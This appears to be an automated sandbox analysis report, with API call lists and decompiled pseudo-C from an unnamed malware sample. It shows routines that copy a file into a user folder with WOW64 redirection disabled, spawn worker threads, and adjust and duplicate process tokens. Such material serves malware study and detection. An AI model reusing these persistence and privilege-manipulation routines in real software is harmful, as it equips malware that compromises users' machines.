0x005c3f0d
0x005c3f10
0x005c3eee
0x005c3eee
0x005c3ef5
0x005c3efc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x005c3efc
0x005c3f15
0x005c3f1a
0x005c3f1d
0x005c3f21
0x005c3f21
0x005c3f25
0x005c3f26
0x005c3f2b
0x005c3f2e
0x005c3f32
0x005c3f35
0x005c3f3c
0x005c3f41
0x005c3f44
0x005c3f48
0x005c3f5f
0x005c3f4a
0x005c3f4a
0x005c3f4d
0x005c3f56
0x005c3f5b
0x00000000
0x00000000
0x005c3f5d
0x00000000
0x005c3f5b
0x005c3f64
0x005c3f6a
0x005c3f6a
0x005c3f6a
0x005c3f6d
0x005c3f6e
0x005c3f73
0x005c3f7d
0x005c3f83
0x005c3f88
0x005c3f8b
0x005c3f92
0x005c3f94
0x005c3f95
0x005c3f96
0x005c3f9b
0x005c3f9e
0x005c3fa2
0x005c3faf
0x005c4038
0x005c3fb5
0x005c3fb5
0x005c3fb9
0x005c3fba
0x005c3fbf
0x005c3fc2
0x005c3fc6
0x005c403e
0x005c3fc8
0x005c3fcc
0x005c3fd1
0x005c3fd3
0x005c3fd6
0x005c3fdb
0x005c3fdd
0x005c3fdf
0x005c3fe8
0x005c3fed
0x005c3fed
0x005c3ff0
0x005c3ff4
0x005c3ff7
0x005c3fdf
0x005c3ffc
0x005c401e
0x005c4001
0x005c4007
0x005c401b
0x005c401b
0x005c401b
0x00000000
0x005c4009
0x005c4009
0x005c4010
0x00000000
0x005c4012
0x005c4012
0x005c4019
0x005c402b
0x005c402d
0x005c4035
0x00000000
0x00000000
0x00000000
0x005c4019
0x005c4010
0x00000000
0x005c4007
0x005c4022
0x005c4029
0x00000000
0x00000000
0x005c4029
0x005c3fd1
0x005c3fc6
0x005c4041
0x005c4041
0x005c4047
0x005c4049
0x005c404d
0x005c4074
0x005c4074
0x005c4074
0x005c4075
0x005c4076
0x005c4077
0x005c4079
0x005c407e
0x00000000
0x00000000
0x005c4080
0x005c4086
0x005c4087
0x005c4088
0x005c408a
0x005c408c
0x005c4095
0x00000000
0x00000000
0x00000000
0x005c409b
0x005c409b
0x005c40a1
0x005c40a4
0x005c40a4
0x005c40b0
0x005c40c5
0x005c40c5
0x005c40c7
0x005c40b2
0x005c40b2
0x005c40b4
0x005c40b8
0x005c40b8
0x005c40b9
0x005c40be
0x005c40be
0x005c40c3
0x005c40cf
0x005c40eb
0x005c40f5
0x005c40fa
0x005c40fd
0x005c4108
0x005c410b
0x005c410d
0x005c410f
0x005c410f
0x005c4117
0x005c411f
0x005c411f
0x005c4124
0x005c4124
0x005c412f
0x005c4146
0x005c414f
0x005c4154
0x005c4157
0x005c4157
0x005c415b
0x005c4195
0x005c4195
0x005c419c
0x00000000
0x00000000
0x005c41a4
0x005c416a
0x005c4173
0x005c4179
0x005c417c
0x005c4182
0x005c4185
0x005c4188
0x005c418b
0x005c418e
0x005c4192
0x005c4192
0x00000000
0x005c41a6
0x005c41a6
0x005c41ad
0x005c41ad
0x005c41b9
0x005c41b9
0x005c41be
0x005c41c2
0x005c41c8
0x005c41e4
0x005c41ea
0x005c41eb
0x00000000
0x005c41ed
0x005c41f5
0x005c424c
0x005c4251
0x005c4059
0x005c405c
0x005c4062
0x005c406a
0x005c406e
0x005c4072
0x005c4072
0x00000000
0x00000000
0x00000000
0x00000000
0x005c41f7
0x005c41fb
0x005c4204
0x00000000
0x005c4206
0x005c4206
0x005c420b
0x005c4223
0x005c4229
0x005c422a
0x00000000
0x005c422c
0x005c422c
0x005c422c
0x00000000
0x005c422a
0x005c422e
0x005c4234
0x005c4242
0x005c4242
0x005c424a
0x00000000
0x00000000
0x00000000
0x00000000
0x005c424a
0x005c4204
0x005c41f5
0x00000000
0x005c41eb
0x005c425e
0x005c4265
0x005c4268
0x005c426a
0x005c426d
0x005c4272
0x005c4272
0x005c4275
0x005c427c
0x005c427f
0x005c4281
0x005c4283
0x005c4286
0x005c428b
0x005c428b
0x005c429b
0x005c429f
0x005c42a4
0x005c42a7
0x005c42ab
0x005c42ab
0x00000000
0x005c42ab
0x005c41b6
0x005c41b6
0x00000000
0x005c40d1
0x005c40d5
0x005c40e5
0x005c4257
0x005c4257
0x005c425a
0x00000000
0x00000000
0x00000000
0x005c40e5
0x00000000
0x005c40cf
0x005c4074
0x005c42ac
0x005c42ac
0x005c42b2
0x005c42b5
0x005c42ba
0x005c42ba
0x005c42bf
0x005c42c2
0x005c42c7
0x005c42c7
0x005c42cc
0x005c42cf
0x005c42d4
0x005c42d4
0x005c42db
0x005c42ec

APIs

Part of subcall function 005D43C0: InitializeCriticalSectionAndSpinCount.KERNEL32(005D9BBC,00000800,00000000,?,00000000,?,005C962D,?,?,?,?,?,00000000,00000000,00000000,?), ref: 005D43F6

SHGetFolderPathW.SHELL32(00000000,0000001A,000000FF,00000000,?), ref: 005C408D
CloseHandle.KERNEL32(FFFFFFFF), ref: 005C40A4
lstrcmpiW.KERNEL32(00000000,00000000), ref: 005C40DD
CreateDirectoryW.KERNEL32(?,00000000), ref: 005C412F
CopyFileW.KERNEL32(?,00000000,00000000), ref: 005C41CF
SleepEx.KERNEL32(000003E8,00000000), ref: 005C41E4
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 005C41FC
CopyFileW.KERNEL32(?,00000000,00000000), ref: 005C4212
SleepEx.KERNEL32(000003E8,00000000), ref: 005C4223
Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 005C4242

Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Wow64$CopyFileRedirectionSleep$CloseCountCreateCriticalDirectoryDisableFolderFreeHandleHeapInitializePathRevertSectionSpinlstrcmpi
String ID:
API String ID: 1225154383-0
Opcode ID: 892dd195a6c44f18e98fb77022a160fa715edf48b09740a3cdc641e22ae088fa
Instruction ID: b0cab4b6cca8cc35bb3d8758ea6dc526eb0d853b0c4e97d333bbdcb5e1e0ea5a
Opcode Fuzzy Hash: 892dd195a6c44f18e98fb77022a160fa715edf48b09740a3cdc641e22ae088fa
Instruction Fuzzy Hash: 3FC1CEB59043119FDB209FA4DC99F6A7BE8FF90310F04892DF9859B291E734D948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005D1A70, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 416
stringthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E005D1A70(intOrPtr __ecx) {
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t177;
				signed int _t178;
				int _t194;
				WCHAR** _t202;
				WCHAR** _t207;
				signed int _t212;
				intOrPtr _t216;
				int _t222;
				signed int _t224;
				void* _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				intOrPtr _t251;
				void* _t256;
				signed int _t258;
				signed int _t261;
				signed int _t262;
				signed int _t265;
				signed int _t269;
				signed int _t271;
				intOrPtr _t277;
				void* _t279;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				void* _t286;
				signed int _t287;
				WCHAR* _t288;
				signed int _t289;
				void* _t290;
				WCHAR* _t292;
				WCHAR** _t293;
				signed int _t295;
				intOrPtr _t298;
				void* _t299;
				signed int _t300;
				intOrPtr* _t301;
				intOrPtr* _t303;

				if( *((intOrPtr*)(__ecx)) <= 0) {
					L79:
					return 1;
				} else {
					_t166 = 1;
					_t286 = 0;
					_t243 = 0;
					 *_t303 = __ecx;
					do {
						 *(_t303 + 0x10) = _t243;
						if((_t166 & 0x00000001) == 0) {
							_t167 =  *_t286;
							__eflags = _t167;
							if(_t167 != 0) {
								E005C91E0(_t167);
								_t303 = _t303 + 4;
							}
							_t168 =  *(_t286 + 4);
							__eflags = _t168;
							if(_t168 != 0) {
								E005C91E0(_t168);
								_t303 = _t303 + 4;
							}
							_t169 =  *(_t286 + 8);
							__eflags = _t169;
							if(_t169 != 0) {
								E005C91E0(_t169);
								_t303 = _t303 + 4;
							}
							_t170 =  *(_t286 + 0x10);
							__eflags = _t170;
							if(_t170 != 0) {
								E005C91E0(_t170);
								_t303 = _t303 + 4;
							}
							_t171 = _t286;
							_t31 = _t286 + 4; // 0x4
							_t287 = _t286 + 8;
							_t33 = _t171 + 0x10; // 0x10
							_t34 = _t171 + 0xc; // 0xc
							_t290 = _t34;
							_t299 = _t171;
							_t172 =  *(_t171 + 0xc);
							 *(_t303 + 4) = _t31;
							 *(_t303 + 0xc) = _t33;
							__eflags = _t172;
							if(_t172 != 0) {
								E005C91E0(_t172);
								_t303 = _t303 + 4;
							}
							_t245 = _t287;
							_t286 = _t299;
						} else {
							_t241 = E005C3180(0x1c, 0);
							_t303 = _t303 + 8;
							_t286 = _t241;
							_t22 = _t241 + 0xc; // 0xc
							_t290 = _t22;
							_t24 = _t286 + 4; // 0x4
							 *(_t303 + 0xc) = _t241 + 0x10;
							_t26 = _t286 + 8; // 0x8
							_t245 = _t26;
							 *(_t303 + 4) = _t24;
						}
						_t277 =  *_t303;
						_t300 =  *(_t303 + 0x10);
						 *((intOrPtr*)(_t286 + 0x18)) = 0;
						 *((intOrPtr*)(_t286 + 0x14)) = 0;
						 *(_t286 + 0x10) = 0;
						 *((intOrPtr*)(_t286 + 0xc)) = 0;
						 *(_t286 + 8) = 0;
						 *(_t286 + 4) = 0;
						 *_t286 = 0;
						_t48 = _t286 + 0x14; // 0x14
						 *(_t303 + 0x14) = _t245;
						_t177 = E005CB3F0( *((intOrPtr*)( *((intOrPtr*)(_t277 + 4)) + _t300 * 4)),  *(_t303 + 0x14), _t245,  *(_t303 + 0x14), _t48, _t290);
						_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t277 + 4)) + _t300 * 4));
						if(_t177 == 0) {
							_t178 = E005C22A0(_t251);
							__eflags = _t178;
							if(_t178 == 0) {
								_t301 =  *_t303;
								_t246 =  *(_t303 + 0x10);
								_push( *( *(_t301 + 4) + _t246 * 4));
								_t178 = E005D3360();
								__eflags = _t178;
								 *_t286 = _t178;
								if(_t178 != 0) {
									_push(_t286);
									_t178 = E005D4EA0(_t301);
								}
								goto L66;
							}
							_t246 =  *(_t303 + 0x10);
							goto L33;
						} else {
							_push(_t251);
							_t178 = E005D3360();
							_t292 = _t303 + 0x1c;
							 *(_t303 + 0xc) = _t286;
							 *_t286 = _t178;
							if(_t178 == 0) {
								_t246 =  *(_t303 + 0x10);
								_t301 =  *_t303;
								_t286 =  *(_t303 + 0xc);
								goto L66;
							}
							_t288 = _t292;
							E005D4520(_t292, 0x96);
							_t303 = _t303 + 8;
							_t293 =  *(_t303 + 8);
							if(lstrcmpiW( *_t293, _t292) == 0) {
								_t301 =  *_t303;
								_t286 =  *(_t303 + 0xc);
								_push(_t286);
								_t178 = E005C4C20(_t301);
								_t246 =  *(_t303 + 0x10);
								goto L66;
							}
							E005D4520(_t288, 0x97);
							_t303 = _t303 + 8;
							_t194 = lstrcmpiW( *_t293, _t288);
							_t246 =  *(_t303 + 0x10);
							_t286 =  *(_t303 + 0xc);
							if(_t194 == 0) {
								_t301 =  *_t303;
								_push(_t286);
								E005D4EA0(_t301);
								__eflags = _t246;
								_t178 = 0 | _t246 > 0x00000000;
								_t246 = _t246 - _t178;
								goto L66;
							}
							E005D4520(_t303 + 0x20, 0x98);
							_t303 = _t303 + 8;
							if(lstrcmpiW( *_t293, _t303 + 0x1c) == 0) {
								_t178 =  *( *(_t303 + 8));
								__eflags = _t178;
								if(_t178 == 0) {
									L33:
									_t301 =  *_t303;
									goto L66;
								}
								__eflags =  *_t178;
								if( *_t178 == 0) {
									goto L33;
								}
								_t301 =  *_t303;
								_t279 = 1;
								__eflags = 1;
								while(1) {
									_t91 = _t279 + 1; // 0x2
									_t256 = _t91;
									__eflags = _t279 - 0x1ff;
									if(_t279 > 0x1ff) {
										break;
									}
									__eflags =  *(_t178 + _t279);
									_t279 = _t256;
									if(__eflags != 0) {
										continue;
									}
									break;
								}
								_t93 = _t256 - 2; // 0x0
								__eflags = _t93 - 0x1fe;
								if(_t93 > 0x1fe) {
									goto L66;
								}
								_t202 = E005C7400(_t178, _t256 - 1);
								_t303 = _t303 + 8;
								 *(_t303 + 8) = _t202;
								_t178 =  *( *(_t301 + 4) + _t246 * 4);
								_t258 =  *(_t178 + 0x58);
								 *(_t303 + 0x14) = _t178;
								__eflags = _t258;
								if(_t258 <= 0) {
									_t281 = 0;
									__eflags = 0;
									L3:
									__eflags = _t281 - _t258;
									if(_t281 != _t258) {
										goto L66;
									}
									_t178 = E005C3180(8 + _t258 * 8,  *((intOrPtr*)( *(_t303 + 0x14) + 0x54)));
									_t303 = _t303 + 8;
									_t282 = 0;
									__eflags = _t178;
									if(_t178 != 0) {
										_t269 =  *(_t301 + 4);
										_t284 =  *((intOrPtr*)(_t269 + _t246 * 4));
										 *(_t303 + 0x14) = _t269;
										 *(_t178 +  *(_t284 + 0x58) * 4) =  *(_t303 + 8);
										 *(_t284 + 0x54) = _t178;
										_t282 = 0;
										_t178 =  *( *(_t303 + 0x14) + _t246 * 4);
										_t17 = _t178 + 0x58;
										 *_t17 =  *(_t178 + 0x58) + 1;
										__eflags =  *_t17;
									}
									_t295 = 0xffffffffffffffff;
									_t261 = 1;
									L55:
									if(_t261 == 0 ||  *0x5d9c24 > 0x31) {
										goto L66;
									} else {
										 *((intOrPtr*)(_t286 + 0x18)) =  *((intOrPtr*)(_t303 + 0xf8));
										 *(_t303 + 8) = _t282;
										_t207 = E005CB7A0( *( *(_t303 + 4)));
										_t303 = _t303 + 4;
										 *(_t303 + 8) = _t207;
										_t178 = CreateThread(0, 0, E005D13A0, _t286, 0, _t303 + 0x18);
										if( *(_t303 + 4) == 0) {
											L65:
											_t286 = 0;
											goto L66;
										}
										_t211 =  *( *(_t301 + 4) + _t246 * 4);
										_t262 =  *( *( *(_t301 + 4) + _t246 * 4) + 0x50);
										if(_t295 < 0 || _t295 >= _t262) {
											_t212 = E005C3180(8 + _t262 * 8,  *((intOrPtr*)(_t211 + 0x4c)));
											_t303 = _t303 + 8;
											__eflags = _t212;
											if(_t212 == 0) {
												goto L63;
											}
											_t289 = _t212;
											 *(_t289 +  *( *( *(_t301 + 4) + _t246 * 4) + 0x50) * 8) =  *(_t303 + 8);
											_t216 = E005D4E70();
											_t265 =  *(_t301 + 4);
											_t283 =  *(_t265 + _t246 * 4);
											 *((intOrPtr*)(_t289 + 4 +  *(_t283 + 0x50) * 8)) = _t216;
											 *(_t283 + 0x4c) = _t289;
											_t178 =  *(_t265 + _t246 * 4);
											 *((intOrPtr*)(_t178 + 0x50)) =  *((intOrPtr*)(_t178 + 0x50)) + 1;
										} else {
											 *((intOrPtr*)( *((intOrPtr*)( *( *(_t301 + 4) + _t246 * 4) + 0x4c)) + 4 + _t295 * 8)) = E005D4E70();
											L63:
											_t178 =  *(_t303 + 8);
											if(_t178 != 0) {
												_t178 = E005C91E0(_t178);
												_t303 = _t303 + 4;
											}
										}
										goto L65;
									}
								}
								_t298 =  *((intOrPtr*)(_t178 + 0x54));
								_t281 = 0;
								__eflags = 0;
								while(1) {
									_t178 =  *(_t303 + 8);
									__eflags =  *((intOrPtr*)(_t298 + _t281 * 4)) - _t178;
									if( *((intOrPtr*)(_t298 + _t281 * 4)) == _t178) {
										goto L3;
									}
									_t281 = _t281 + 1;
									__eflags = _t281 - _t258;
									if(_t281 < _t258) {
										continue;
									}
									goto L3;
								}
								goto L3;
							}
							E005D4520(_t303 + 0x20, 0x6a);
							_t303 = _t303 + 8;
							_t222 = lstrcmpiW( *_t293, _t303 + 0x1c);
							_t301 =  *_t303;
							if(_t222 == 0) {
								L27:
								_t295 = 0;
								_t271 =  *( *(_t301 + 4) + _t246 * 4);
								_t224 =  *(_t271 + 0x50);
								if(_t224 <= 0) {
									L51:
									if(_t295 >= _t224) {
										_t178 = 1;
										__eflags = 1;
										_t261 = 1;
									} else {
										_t261 = 0 | E005D4E70() -  *((intOrPtr*)( *((intOrPtr*)( *( *(_t301 + 4) + _t246 * 4) + 0x4c)) + 4 + _t295 * 8)) - 0x00000707 > 0x00000000;
										_t178 = 1;
									}
									_t282 = _t178;
									goto L55;
								}
								while(lstrcmpiW( *( *((intOrPtr*)(_t271 + 0x4c)) + _t295 * 8),  *( *(_t303 + 4))) != 0) {
									_t295 = _t295 + 1;
									_t271 =  *( *(_t301 + 4) + _t246 * 4);
									_t224 =  *(_t271 + 0x50);
									if(_t295 < _t224) {
										continue;
									}
									goto L51;
								}
								_t224 =  *( *( *(_t301 + 4) + _t246 * 4) + 0x50);
								goto L51;
							}
							 *(_t303 + 0x1c) = 0x44;
							_t178 = lstrcmpiW( *( *(_t303 + 8)), _t303 + 0x1c);
							_t282 = 0;
							_t295 = 0xffffffff;
							_t261 = 1;
							if(_t178 != 0) {
								goto L55;
							}
							goto L27;
						}
						L66:
						_t243 = _t246 + 1;
						_t166 = _t178 & 0xffffff00 | _t286 == 0x00000000;
					} while (_t243 <  *_t301);
					if(_t286 != 0) {
						_t180 =  *_t286;
						if( *_t286 != 0) {
							E005C91E0(_t180);
							_t303 = _t303 + 4;
						}
						_t181 =  *(_t286 + 4);
						if( *(_t286 + 4) != 0) {
							E005C91E0(_t181);
							_t303 = _t303 + 4;
						}
						_t182 =  *(_t286 + 8);
						if( *(_t286 + 8) != 0) {
							E005C91E0(_t182);
							_t303 = _t303 + 4;
						}
						_t183 =  *(_t286 + 0x10);
						if( *(_t286 + 0x10) != 0) {
							E005C91E0(_t183);
							_t303 = _t303 + 4;
						}
						_t184 =  *((intOrPtr*)(_t286 + 0xc));
						if( *((intOrPtr*)(_t286 + 0xc)) != 0) {
							E005C91E0(_t184);
							_t303 = _t303 + 4;
						}
						E005C91E0(_t286);
					}
					goto L79;
				}
			}

0x005d1a7d
0x005d1f40
0x005d1f4d
0x005d1a83
0x005d1a83
0x005d1a85
0x005d1a87
0x005d1a89
0x005d1ae3
0x005d1ae5
0x005d1ae9
0x005d1b0f
0x005d1b11
0x005d1b13
0x005d1b16
0x005d1b1b
0x005d1b1b
0x005d1b1e
0x005d1b21
0x005d1b23
0x005d1b26
0x005d1b2b
0x005d1b2b
0x005d1b2e
0x005d1b31
0x005d1b33
0x005d1b36
0x005d1b3b
0x005d1b3b
0x005d1b3e
0x005d1b41
0x005d1b43
0x005d1b46
0x005d1b4b
0x005d1b4b
0x005d1b4e
0x005d1b50
0x005d1b53
0x005d1b56
0x005d1b59
0x005d1b59
0x005d1b5c
0x005d1b5e
0x005d1b61
0x005d1b65
0x005d1b69
0x005d1b6b
0x005d1b6e
0x005d1b73
0x005d1b73
0x005d1b76
0x005d1b78
0x005d1aeb
0x005d1aef
0x005d1af4
0x005d1af7
0x005d1af9
0x005d1af9
0x005d1aff
0x005d1b02
0x005d1b06
0x005d1b06
0x005d1b09
0x005d1b09
0x005d1b7a
0x005d1b7f
0x005d1b83
0x005d1b86
0x005d1b89
0x005d1b8c
0x005d1b8f
0x005d1b92
0x005d1b95
0x005d1b9d
0x005d1ba8
0x005d1bb2
0x005d1bbc
0x005d1bbf
0x005d1cd5
0x005d1cda
0x005d1cdc
0x005d1d12
0x005d1d15
0x005d1d1c
0x005d1d1f
0x005d1d24
0x005d1d26
0x005d1d28
0x005d1d30
0x005d1d31
0x005d1d31
0x00000000
0x005d1d28
0x005d1cde
0x00000000
0x005d1bc5
0x005d1bc5
0x005d1bc6
0x005d1bcd
0x005d1bd1
0x005d1bd5
0x005d1bd7
0x005d1cea
0x005d1cee
0x005d1cf1
0x00000000
0x005d1cf1
0x005d1bdd
0x005d1be5
0x005d1bea
0x005d1bee
0x005d1bfe
0x005d1cfa
0x005d1cfd
0x005d1d03
0x005d1d04
0x005d1d09
0x00000000
0x005d1d09
0x005d1c0a
0x005d1c0f
0x005d1c15
0x005d1c17
0x005d1c1b
0x005d1c21
0x005d1d3b
0x005d1d40
0x005d1d41
0x005d1d48
0x005d1d4a
0x005d1d4d
0x00000000
0x005d1d4d
0x005d1c31
0x005d1c36
0x005d1c44
0x005d1d58
0x005d1d5a
0x005d1d5c
0x005d1ce2
0x005d1ce2
0x00000000
0x005d1ce2
0x005d1d5e
0x005d1d61
0x00000000
0x00000000
0x005d1d67
0x005d1d6c
0x005d1d6c
0x005d1d6d
0x005d1d6d
0x005d1d6d
0x005d1d70
0x005d1d76
0x00000000
0x00000000
0x005d1d7b
0x005d1d7d
0x005d1d7f
0x00000000
0x00000000
0x00000000
0x005d1d7f
0x005d1d81
0x005d1d84
0x005d1d8a
0x00000000
0x00000000
0x005d1d93
0x005d1d98
0x005d1d9b
0x005d1da2
0x005d1da5
0x005d1da8
0x005d1dac
0x005d1dae
0x005d1a8e
0x005d1a8e
0x005d1a90
0x005d1a90
0x005d1a92
0x00000000
0x00000000
0x005d1aa7
0x005d1aac
0x005d1aaf
0x005d1ab1
0x005d1ab3
0x005d1ab5
0x005d1ab8
0x005d1abb
0x005d1ac6
0x005d1ac9
0x005d1ad0
0x005d1ad2
0x005d1ad5
0x005d1ad5
0x005d1ad5
0x005d1ad5
0x005d1ada
0x005d1add
0x005d1e05
0x005d1e07
0x00000000
0x005d1e1a
0x005d1e21
0x005d1e2a
0x005d1e2e
0x005d1e33
0x005d1e36
0x005d1e4a
0x005d1e55
0x005d1ed3
0x005d1ed3
0x00000000
0x005d1ed3
0x005d1e5c
0x005d1e5f
0x005d1e62
0x005d1e87
0x005d1e8c
0x005d1e8f
0x005d1e91
0x00000000
0x00000000
0x005d1e93
0x005d1ea2
0x005d1ea5
0x005d1eaa
0x005d1ead
0x005d1eb3
0x005d1eb7
0x005d1eba
0x005d1ebd
0x005d1e68
0x005d1e76
0x005d1ec2
0x005d1ec2
0x005d1ec8
0x005d1ecb
0x005d1ed0
0x005d1ed0
0x005d1ec8
0x00000000
0x005d1e62
0x005d1e07
0x005d1db4
0x005d1db7
0x005d1db7
0x005d1db9
0x005d1db9
0x005d1dbd
0x005d1dc0
0x00000000
0x00000000
0x005d1dc6
0x005d1dc7
0x005d1dc9
0x00000000
0x00000000
0x00000000
0x005d1dcb
0x00000000
0x005d1db9
0x005d1c51
0x005d1c56
0x005d1c60
0x005d1c62
0x005d1c67
0x005d1c95
0x005d1c98
0x005d1c9a
0x005d1c9d
0x005d1ca2
0x005d1dd9
0x005d1ddb
0x005d1e00
0x005d1e00
0x005d1e01
0x005d1ddd
0x005d1df6
0x005d1dfb
0x005d1dfb
0x005d1e03
0x00000000
0x005d1e03
0x005d1ca8
0x005d1cc5
0x005d1cc6
0x005d1cc9
0x005d1cce
0x00000000
0x00000000
0x00000000
0x005d1cd0
0x005d1dd6
0x00000000
0x005d1dd6
0x005d1c6d
0x005d1c7b
0x005d1c81
0x005d1c85
0x005d1c8a
0x005d1c8f
0x00000000
0x00000000
0x00000000
0x005d1c8f
0x005d1ed5
0x005d1ed5
0x005d1ed8
0x005d1edb
0x005d1ee6
0x005d1ee8
0x005d1eec
0x005d1eef
0x005d1ef4
0x005d1ef4
0x005d1ef7
0x005d1efc
0x005d1eff
0x005d1f04
0x005d1f04
0x005d1f07
0x005d1f0c
0x005d1f0f
0x005d1f14
0x005d1f14
0x005d1f17
0x005d1f1c
0x005d1f1f
0x005d1f24
0x005d1f24
0x005d1f27
0x005d1f2c
0x005d1f2f
0x005d1f34
0x005d1f34
0x005d1f38
0x005d1f3d
0x00000000
0x005d1ee6

APIs

lstrcmpiW.KERNEL32(?,?,00000014,0000000C), ref: 005D1BFA
lstrcmpiW.KERNEL32(?,?), ref: 005D1C15

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

lstrcmpiW.KERNEL32(?,?), ref: 005D1C40
lstrcmpiW.KERNEL32(?,?), ref: 005D1C60
lstrcmpiW.KERNEL32(?,?), ref: 005D1C7B
lstrcmpiW.KERNEL32(?,?), ref: 005D1CB4
CreateThread.KERNEL32(00000000,00000000,005D13A0,?,00000000,?), ref: 005D1E4A

Strings

D, xrefs: 005D1C6D

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: lstrcmpi$Heap$AllocateCreateProcessThread
String ID: D
API String ID: 4198123405-2746444292
Opcode ID: 316f8c3741a418b80612529a1e4a06a6d0f8d88e3cd46e014a94c88674296b2a
Instruction ID: 6b3a51f26001f8a35e192b16cf2703cd98ce4582c1a1f1a5349f86a01ef79f5a
Opcode Fuzzy Hash: 316f8c3741a418b80612529a1e4a06a6d0f8d88e3cd46e014a94c88674296b2a
Instruction Fuzzy Hash: 1DE18FB4A04606AFD724DF29D885A2ABBE9FF84344F04882FE845C7351EB31ED15CB95

Uniqueness

Uniqueness Score: -1.00%

Function 005C8CD0, Relevance: 13.6, APIs: 9, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E005C8CD0(void* __ecx) {
				void** _v12;
				char _v204;
				struct _LUID _v216;
				char _v220;
				struct _TOKEN_PRIVILEGES _v236;
				long _v240;
				int _v244;
				char _v248;
				void* _v252;
				void* _v256;
				int _v260;
				void* _v268;
				intOrPtr _v276;
				intOrPtr* _t29;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr _t34;
				void* _t43;
				intOrPtr* _t44;
				struct _TOKEN_PRIVILEGES* _t49;
				intOrPtr* _t58;
				void* _t62;
				intOrPtr _t64;
				WCHAR* _t68;
				HANDLE* _t69;
				intOrPtr _t71;

				_t69 =  &_v256;
				_v252 = 0xffffffff;
				_t71 =  *0x5d9c00; // 0x0
				_v244 = 0;
				_v256 = 0;
				_v248 = 0;
				_v260 = 0;
				if(_t71 != 0) {
					L2:
					_v240 = 0;
					if(OpenProcessToken(GetCurrentProcess(), 0x28, _t69) != 0) {
						_t68 =  &_v204;
						E005D4520(_t68, 0x5f);
						if(LookupPrivilegeValueW(0, _t68,  &_v216) != 0) {
							_t49 =  &_v220;
							_t49->PrivilegeCount = 1;
							_t49->Privileges[0].Luid = 2;
							AdjustTokenPrivileges(_v260, 0, _t49, 0x10,  &_v236,  &_v240);
						}
					}
					_t29 =  *0x5d9c4c; // 0x0
					if(_t29 == 0) {
						L16:
						_t30 =  *0x5d9b80; // 0x0
						if(_t30 == 0) {
							L21:
							_t31 = _v260;
							if(_t31 == 0) {
								L23:
								return _t31;
							}
							AdjustTokenPrivileges(_t31, 0,  &_v236, 0x10, 0, 0);
							return CloseHandle(_v260);
						}
						_t34 =  *_t30();
						_t64 = _t34;
						if(_t34 == 0xffffffff) {
							goto L21;
						}
						L18:
						RevertToSelf();
						_push( &_v252);
						_push(_t64);
						if( *0x5d9c00() != 0 && DuplicateTokenEx(_v260, 0x2000000, 0, 1, 1,  &_v252) != 0) {
							CloseHandle(_v268);
							 *_v12 = _v260;
						}
						goto L21;
					}
					_push( &_v248);
					_push( &_v256);
					_push(1);
					_push(0);
					_push(0);
					if( *_t29() == 0) {
						goto L16;
					}
					_t43 = _v268;
					_t64 = 0xffffffffffffffff;
					if(_t43 == 0) {
						L13:
						_t44 =  *0x5d9be8; // 0x0
						if(_t44 != 0) {
							 *_t44(_v276);
						}
						if(_t64 != 0xffffffff) {
							goto L18;
						} else {
							goto L16;
						}
					}
					_t62 = 0;
					_t58 = _v276 + 8;
					while( *_t58 != 0) {
						_t62 = _t62 + 1;
						_t58 = _t58 + 0xc;
						if(_t62 < _t43) {
							continue;
						}
						goto L13;
					}
					_t64 =  *((intOrPtr*)(_t58 - 8));
					goto L13;
				}
				_t31 = E005D18C0(__ecx, _t71);
				if(_t31 == 0) {
					goto L23;
				}
				goto L2;
			}

0x005c8cd1
0x005c8cd9
0x005c8ce1
0x005c8ce7
0x005c8ceb
0x005c8cef
0x005c8cf3
0x005c8cf6
0x005c8d05
0x005c8d05
0x005c8d21
0x005c8d23
0x005c8d2a
0x005c8d42
0x005c8d44
0x005c8d50
0x005c8d56
0x005c8d68
0x005c8d68
0x005c8d42
0x005c8d6e
0x005c8d75
0x005c8dc7
0x005c8dc7
0x005c8dce
0x005c8e25
0x005c8e25
0x005c8e2a
0x005c8e4f
0x005c8e4f
0x005c8e4f
0x005c8e39
0x00000000
0x005c8e42
0x005c8dd0
0x005c8dd2
0x005c8dd7
0x00000000
0x00000000
0x005c8dd9
0x005c8dd9
0x005c8de3
0x005c8de4
0x005c8ded
0x005c8e19
0x005c8e23
0x005c8e23
0x00000000
0x005c8ded
0x005c8d81
0x005c8d82
0x005c8d83
0x005c8d85
0x005c8d86
0x005c8d8b
0x00000000
0x00000000
0x005c8d8d
0x005c8d93
0x005c8d96
0x005c8db3
0x005c8db3
0x005c8dba
0x005c8dc0
0x005c8dc0
0x005c8dc5
0x00000000
0x00000000
0x00000000
0x00000000
0x005c8dc5
0x005c8d9c
0x005c8d9e
0x005c8da1
0x005c8da6
0x005c8da7
0x005c8dac
